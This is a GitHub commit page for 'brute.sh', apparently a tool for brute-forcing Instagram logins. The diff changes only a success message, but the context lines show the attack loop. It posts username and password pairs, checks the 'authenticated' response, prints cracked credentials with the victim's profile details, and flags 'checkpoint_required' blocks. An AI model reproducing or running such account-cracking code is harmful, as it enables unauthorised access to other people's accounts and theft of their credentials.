Skip to content

Commit

Permalink
Update brute.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
ItsMeLBoy authored Sep 7, 2019
1 parent a1a40d7 commit 85aa536
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion brute.sh
Original file line number Diff line number Diff line change
Expand Up @@ -104,7 +104,7 @@ function brute(){
-d "username=${i}&password=${pass}")
login=$(echo $url | grep -o "authenticated.*" | cut -d ":" -f2 | cut -d "," -f1)
if [[ $login =~ "true" ]]; then
echo -e "[${green}+${white}] ${yellow}get it! ${blue}[${white}@$i - $pass${blue}] ${white}- with: "$(curl -s "https://www.instagram.com/$i/" | grep "<meta content=" | cut -d '"' -f2 | cut -d "," -f1)
echo -e "[${green}+${white}] ${yellow}You get it! ${blue}[${white}@$i - $pass${blue}] ${white}- with: "$(curl -s "https://www.instagram.com/$i/" | grep "<meta content=" | cut -d '"' -f2 | cut -d "," -f1)
elif [[ $login =~ "false" ]]; then
echo -e "[${red}!${white}] @$i - ${red}failed to crack${white}"
elif [[ $url =~ "checkpoint_required" ]]; then
Expand Down

0 comments on commit 85aa536

Please sign in to comment.